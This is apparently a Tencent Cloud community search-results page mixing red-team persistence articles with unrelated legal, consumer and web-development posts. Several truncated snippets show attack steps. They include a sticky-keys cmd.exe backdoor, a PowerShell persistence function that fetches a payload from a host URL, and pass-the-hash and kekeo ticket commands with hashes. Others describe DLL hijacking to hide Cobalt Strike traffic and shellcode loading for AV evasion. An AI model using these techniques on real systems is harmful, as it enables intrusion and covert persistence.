- 综合排序
- 最热优先
- 最新优先
- 来自专栏网络安全攻防
Windows维权之粘滞键项维权
sethc.exe.bak //备份sethc.execopy cmd.exe sethc.exe //复制cmd.exe重命名为sethc.exe,也可以使用恶意后门文件来替代sethc.exe之后连续按下5次 ,当我们在权限维持时,如果留下了粘滞键后门,当用户修改密码后,我们在远程连接时可能会出现无法登录的情况,这时候上面这种后门进行权限维持就比较有用了:第一种:创建cmd.exe粘滞键,之后在登录界面按下5次 )或者osk.exe(屏幕上的键盘Win + U启动再选择)Narrator.exe (启动讲述人Win + U启动再选择) Magnify.exe(放大镜Win + U启动再选择)之后在目标主机上按5次 HanKooR/Sticky-Keys )提供了一个额外的选项,把系统控制台给用户,该工具的使用较为简单,下载批处理文件之后下目标主机执行即可虽然执行时可能会有一些小错误,但是执行结果没有任何问题,我们可以按下5次
1.2K10编辑于 2023-11-30 - 来自专栏安恒网络空间安全讲武堂
从挖矿木马看后渗透维权
5.配置定时更新木马的文件,比如sysupdate,update.sh。 ? 通过威胁情报平台确认de.gsearch.com.de域名为攻击者散播挖矿脚本的恶意域名。 ? 阶段5 给木马文件加锁,防止被修改或者删除。 ? 阶段6 修改防火墙配置。 ? 阶段7 清理入侵痕迹。 ? 阶段8 劫持系统进程以及命令(比如ls,cd等常用命令,后期还会劫持sshd)。 以及/etc/bashrc 2.生成了sshd文件 劫持sshd服务 3.将netdns文件设置为开机启动 4.编译libcryptod.c为/usr/local/lib/libcryptod.so 5. No.5 实战中的应用 真实的渗透环境中,我们可以调用多个文件去执行反弹shell,你也可以设置隐藏属性的shell脚本文件,或者alias劫持一些系统命令,给定时文件加锁。
2.7K30发布于 2019-10-16 - 来自专栏黑白天安全团队
分享一个维权手法
function Add-Persistence() { #payload的路径 $payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2" #保存维权马的路径
57940编辑于 2021-12-29 - 来自专栏内网安全学习笔记
利用机器账户进行域维权
前言 机器账户在许多技术中可以用于提权或横向移动,如使用机器账户的委派进行dcsync,使用机器账户也可进行维权操作。 除了上述作用,使用机器账户也可进行域维权操作。 domain:attack.local 使用keke申请tgt票据,用于下一步的ptt攻击 tgt::ask /user:Nayon2 /domain:attack.local /ntlm:32ED87BDB5FDC5E9CBA88547376818D4 图片 Impacket套件wmiexec.py远程链接 python3 wmiexec.py -hash dbf36575210cc5a38ab4050cc6a2e9aa administrator @10.10.10.165 图片 加入高权限用户组用以维权 除去域用户之外,域内机器账户也可以添加到高权限用户组中用以维权。
1.1K10编辑于 2023-04-17 - 来自专栏腾讯云 DNSPod 团队
网络著作侵权成风,维权之路何去何从?
而另一方面,由于网络环境的复杂关系,使得网络作品侵权问题屡见不鲜,著作权人维权之路道阻且长。 在日常生活中,最常见的侵权莫过于以下5种类型: 一、未经著作权人许可,擅自发表其作品; 二、未经著作权人许可,擅自将作品用于网络传播; 三、未经著作权人许可,串改其作品; 四、擅自传播他人作品,未按规支付报酬 为了保护著作权人的合法权益,可以采用以下手段进行维权。 一、和解:如若当事人有自行解决的意向,可以协商处理纠纷问题。 二、调解:当事人可以委托第三方(版权保护协会、律师事务所以及个人等)调解纠纷。
3.7K20发布于 2020-10-09 - 来自专栏红队蓝军
巧用cpl文件维权和免杀
Set obj = CreateObject("Shell.Application") obj.ControlPanelItem("C:\Users\11793\Desktop\cpl.cpl") 5. 经过一系列处理后,找杀毒能力还比较强的360试一下 参考 https://wooyun.js.org/drops/CPL%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8%E4%
58440编辑于 2022-05-18 - 来自专栏安全学习记录
红队技术-上线木马自动维权
在攻防中,上线机器总是需要手动进行维权,太过于麻烦,何不直接上线即维权呢,直接放核心代码,当做个记录 https://github.com/capnspacehook/taskmaster package = nil { return } runWinTask(path) } 管理员权限下自动维权,分为自身维权和迁移路径维权版本,已集合至千机免杀一键生成
32130编辑于 2023-11-16 - 来自专栏红队蓝军
巧用cpl文件维权和免杀
Set obj = CreateObject("Shell.Application") obj.ControlPanelItem("C:\Users\11793\Desktop\cpl.cpl") 5. 经过一系列处理后,找杀毒能力还比较强的360试一下 参考 https://wooyun.js.org/drops/CPL%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8%E4%
61740编辑于 2022-05-17 - 来自专栏逸鹏说道
MVC5 网站开发之九 网站设置
网站配置一般用来保存网站的一些设置,写在配置文件中比写在数据库中要合适一下,因为配置文件本身带有缓存,随网站启动读入缓存中,速度更快,而保存在数据库中要单独为一条记录创建一个表,结构不够清晰,而且读写也没有配置文件容易实现 这次要做的是网站的基本信息,数据保存在SiteConfig.config。 一、网站配置类(SiteConfig) 1、在Nninesky.Core项目新建文件夹Config 2、在Config文件夹添加类SiteConfig。 红框部分为添加类型,说明了配置节的名称和类型,注意红线部分,restartOnExternalChanges设为"false",如果不设置,配置文件修改后会重启网站。 图中红框部分为添加内容,指明SiteConfig的位置文件在网站目录Config文件夹下名为SiteConfig.config的文件。
1.5K50发布于 2018-04-10 - 来自专栏Python机器学习算法说书人
基于 Django 的个人网站(5)
<link rel="stylesheet" href="/static/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q<em>5</em>PaXtkKtu6ug<em>5</em>TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh 标签之前就可以起作用了,代码如下: <script src="/static/js/jquery.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv<em>5</em>vZF<em>5</em>SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>陈志豪的个人网站</title> <link > </head> <body>
陈志豪的个人网站 > </head> <body>
陈志豪的个人网站
1.1K20发布于 2020-05-27来自专栏Java实战博客MD5解密 解密网站
什么是MD5:可以产生出一个128位(16字节)的散列值(hash value) 也就是说MD5加密 会产生16位的字符串 百度说 这是不被认可为安全加密方式,可以被加以破解。 目前来说:市面上的MD5解密,一般都是采用碰撞的方式取解出来。 什么意思呢? 我有密码a ,经过加密后 xxxxxxxxxxxxxxxx 添加到密码库中。 你用网站查 输入一个MD5加密的值,去取值。 网站1 https://www.somd5.com/ 然后输入你们加密值,解不了开就换个网站。 网站2 https://www.cmd5.com/ 可能会收费,不过,有需要,还是不错的 特殊说明: 解决问题的光鲜,藏着磕Bug的痛苦。 万物皆入轮回,谁也躲不掉!
5.1K10编辑于 2022-01-14来自专栏京程一灯确保网站性能的5个小贴士
翻译:疯狂的技术宅 作者:Jennifer Oksnevad 英文标题:5 Tips to ensure website performance 英文原文:https://www.catswhocode.com /blog/5-tips-to-ensure-website-performance 你设计并建立了一个很吸引眼球的网站。 但是如果您的网站不能正常运行,那么前面所提的那些就都不重要要。 ? 访问你网站的人不会呆呆地等着页面加载,你只有几秒钟的时间把他们正在寻找的东西显示出来,说不定他们会去你的竞争对手那里。 名人认可,正面的新闻报道或广泛的口碑可以使你的网站增加两、三倍流量甚至更多。如果您的网站在全世界都来敲门时崩溃,那么再好的宣传都将是无济于事的。 有两种方法可以检测你的网站是否能够处理增加的流量。 5)争取网络中立 如果FCC(美国联邦通信委员会)推翻他们的开放的互联网规则(目前他们正在考虑),你的网站可能会面临比对手慢的加载时间。如果发生这种情况,那么你在网站性上所做的所有努力都将付之东流。
42630发布于 2019-03-28来自专栏小林coding上线 5 分钟,网站就炸了!
昨晚我发文上线了自己的网站:小林的网站上线啦!,结果发文上线不到 10 分钟, 服务器就炸了,读者疯狂跟我说网站 500 错误了。 为什么网站访问很慢? 解决了 500 错误的问题后,后面又有很多读者反馈网站访问太慢了。 不瞒大家说,小林的服务器的配置确实很渣,还是去年阿里云活动白嫖的。 1核心 CPU,2 GB 内存,5M 带宽: 其实小林在开设网站之前,就调研了身边的朋友他们的服务器配置如何? 所以,网站访问慢的原因就是服务器的带宽不够。 我的网站属于静态网站,然后用 nginx 部署,没有用到数据库之类的东西,所以是一个很轻量级的网站,CPU 和 内存 目前为止都是完全够用的,而且文章的图片我都没有放到服务器上,而是放到另外一个图床,所以大家访问的只是服务器的前端文件
62140编辑于 2022-04-07来自专栏腾讯云 DNSPod 团队是维权还是“违权”?
// 继“逍遥镇胡辣汤”大批商家因商标侵权相继摘牌后,又一大家熟知的地方特产“荔浦芋”再掀维权风波。 荔浦芋顾名思义,因其产自于广西桂林地区的荔浦县而得名。 那荔浦这次的维权是否会得到法律的支持呢? 根据《中华人民共和国商标法》第三条规定:经商标局核准注册的商标为注册商标,包括商品商标、服务商标和集体商标、证明商标;商标注册人享有商标专用权,受法律保护。 此案法院审理结果还未可知,我们能做的是加强法律意识和自身的商标品牌保护意识,既要维权又要告诉自己不要“违权”。 现在上腾讯注册商标,价格低至320元,点击左下角“阅读原文”,即可解锁~
58620编辑于 2022-09-27来自专栏黑白天安全团队利用 Microsoft Teams 维权并掩盖 Cobalt Strike 流量
在这种情况下,下一步是在目标中进行绕过EDR维权并在系统中持续进行攻击。 在探索了几个方法后,我们决定使用DLL劫持来进行绕过EDR来维权,经过分析,一个Microsoft Teams二进制文件被确定为容易受到DLL Hijacking 的攻击。 本文解析了维权和C&C的流量如何绕过EDR,一是利用DLL劫持进行维权,然后详细介绍了在使用 Cobalt Strike C2 配置文件与 C&C 通信时如何模拟合法的 Microsoft Teams 经过分析我们认为此可执行文件是在目标中进行维权的理想方法: 它是一个应用程序更新管理器 ( Squirrel ), 存在于多个产品安装中(Teams、Slack、Discord、Webex)。 x48\x00\x00\xFF\xDB\x00\x43\x00"; append "\xF9\x7C\xF3\x4E\x3F\xEC\x7F\x82\x8C\xA4\xB5\
1.6K20发布于 2021-10-18来自专栏黑白天安全团队DLL代理加载shellcod用于免杀,维权等等
根据我们的战术我们要如何绕过Defense 这里分享一个我的方法: 我的典型方法是前往Ninite这样的网站,从常见的软件供应商那里下载一些应用程序,然后开始在安装目录中四处浏览。 SharpDllProxy在原始的“ libnettle-7.dll” DLL中找到了总共441个函数调用,并生成了完整的代理DLL源代码,该函数将函数调用重定向到tmp8AA5.dll(这是原始“ libnettle
3.3K10发布于 2020-11-03来自专栏数据猿锤子员工被变相强制离职,他们要找罗永浩维权
“所以这基本上等于强制离职,大部分人都没办法签了,但也有一部分人打算维权”。 ? 他也迫于无奈选择了转签合同,当天就办理了入职字节跳动,工作地点不变。 以下为该员工自述节选(略有编辑): 遭遇变相强制离职 有员工打算维权 ? 也听说有些人打算维权,但如果签了就没什么好维权的了,毕竟从协议看是主动离职。 TNT加速了锤子科技倒下 ?
65420发布于 2019-05-06来自专栏Metaverse元宇宙“元宇宙”维权第一股!中青宝投资者维权征集已开启 投资者可索赔
从1月18日至今中青宝股价累计跌幅达35%,据维权律师分析,该案已经具备维权条件,符合日期要求的投资者均可报名向上市公司索赔。 深圳证监局关于对深圳中青宝互动网络股份有限公司采取责令改正措施的决定》[2022]4号、《深圳证监局关于对李瑞杰、李逸伦、高国舟采取出具警示函措施的决定》[2022]6号、《深圳证监局关于对李军、郑飞、陈盼莅采取监管谈话措施的决定》[2022]5号 受此影响,紧接的5个交易日均收出小阳线,累计涨幅11.02%,而同期沪深指数均小幅下跌。 孔聪律师认为报名维权的条件为:在2022年1月11日到2022年1月18日之间曾买入中青宝300052股票,且在2022年1月18日收盘仍有持股的用户可报名参与此次维权。
44440编辑于 2022-04-28来自专栏DT数据侠从11万条消费维权数据中,我们发现了什么?
对工商部门而言,每一年都会积累大量来自消费者的投诉维权数据。如何才能更有效地对这些数据进行分析处理、进而更好地服务于消费者呢? 12月6日的线上数据侠实验室·SODA专场中,2017年上海开放数据创新应用大赛(SODA)优秀奖团队——“数决科技与数说故事”的队长陈瑶副教授,为我们分享了基于消费维权大数据的创新应用。 ▍用数据分析来辅助工商部门搞定“痛点” 在生活中,如果大家有过消费维权经历,应该知道可以拨打12315或者12345市民热线向工商局进行举报。 而对工商部门来说,维权、投诉这块累积的数据量还是挺大的。 仅以上海市为例,工商部门2016年承办的12315投诉总量就有11.2万条,且每年以30%速度增长。 (图片说明:数决科技团队“消费维权大数据智能管理平台”新业务流程图) 文本数据可视化只是为了数据的展示,帮助我们了解现状是什么、问题在哪里?
67400发布于 2018-08-08来自专栏沈唁志熊掌号原创保护新保障:版权保护维权功能
维权的内容属于百度搜索结果内; 2. 维权内容为原创资源; 二、 维权标准: 1. 支持单个对多个侵权内容的维权; 2. 需要提供被侵权内容的原创首发证明及材料; 3. 提供侵权内容的侵权详细说明; 三、维权流程: 维权流程:具体操作流程详见 《维权服务使用指南》 疑似侵权线索发掘→选择要申请初审的内容→初审成功发起维权→签署维权协议–线索审核–通过审核–补充权属材料– 启动维权–维权进度查看–维权成功 四、 处理结果: 1. (经济类型的维权案件,在维权成功后,维权赔偿金在扣除维权合理费用(包括但不限于公证费、诉讼费、差旅费、律师费)之后,由版权卫士用户与第三方服务商依照协议约定,按照一定数额获得赔偿或者比例进行分成,平台不会收取任何中介服务费用 ) 今天出门面试,路上就看到百度群里在讨论这个,登录了熊掌号看了一下,就随手点击了去初审,结果都失败了,原因是侵权地址为个人网站,这就很尴尬了 另外一个是侵权网站无ICP备案,举报的是新浪博客,百度给出的解释是个人发到新浪博客的
1.1K10发布于 2018-09-18
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号